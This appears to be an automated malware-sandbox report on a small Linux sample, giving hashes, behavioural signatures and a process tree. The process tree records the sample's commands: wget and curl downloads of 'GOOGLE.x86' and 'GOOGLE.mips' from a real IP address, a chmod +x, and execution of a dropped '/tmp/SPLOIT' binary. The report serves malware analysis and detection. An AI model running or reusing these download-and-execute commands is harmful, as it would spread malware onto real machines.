Analysis
-
max time kernel
139s -
max time network
148s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
29-07-2024 05:16
Static task
static1
Behavioral task
behavioral1
Sample
3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
Resource
debian9-mipsel-20240729-en
General
-
Target
3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
-
Size
2KB
-
MD5
3964a03b43bd29681a1cbabe37ff0be5
-
SHA1
45077644cf8c6a6356a4b8a633618ab7d994ff63
-
SHA256
06a10886d5e417be9f942bae7221d301552d490f2c4914e163a766ec4731cbeb
-
SHA512
0e364a22d00875879d5b6af408891ff34e39db6a48f19fd1208a40507b88d60274b9416813bddff6e334933ec52553d94a5339459f9d314beda98b33fcf911a6
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
SPLOITioc pid process /tmp/SPLOIT 684 SPLOIT -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curldescription ioc process File opened for reading /proc/cpuinfo curl -
Reads runtime system information 2 IoCs
Reads data from /proc virtual filesystem.
Processes:
curldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118description ioc process File opened for modification /tmp/SPLOIT 3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
Processes
-
/tmp/3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118/tmp/3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes1181⤵
- Writes file to tmp directory
PID:643 -
/usr/bin/wgetwget http://185.172.111.210/bins/GOOGLE.x862⤵PID:644
-
/usr/bin/curlcurl -O http://185.172.111.210/bins/GOOGLE.x862⤵
- Checks CPU configuration
- Reads runtime system information
PID:652 -
/bin/catcat GOOGLE.x862⤵PID:682
-
/bin/chmodchmod +x 3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118 SPLOIT2⤵PID:683
-
/tmp/SPLOIT./SPLOIT x86.GOOGLE2⤵
- Executes dropped EXE
PID:684 -
/usr/bin/wgetwget http://185.172.111.210/bins/GOOGLE.mips2⤵PID:686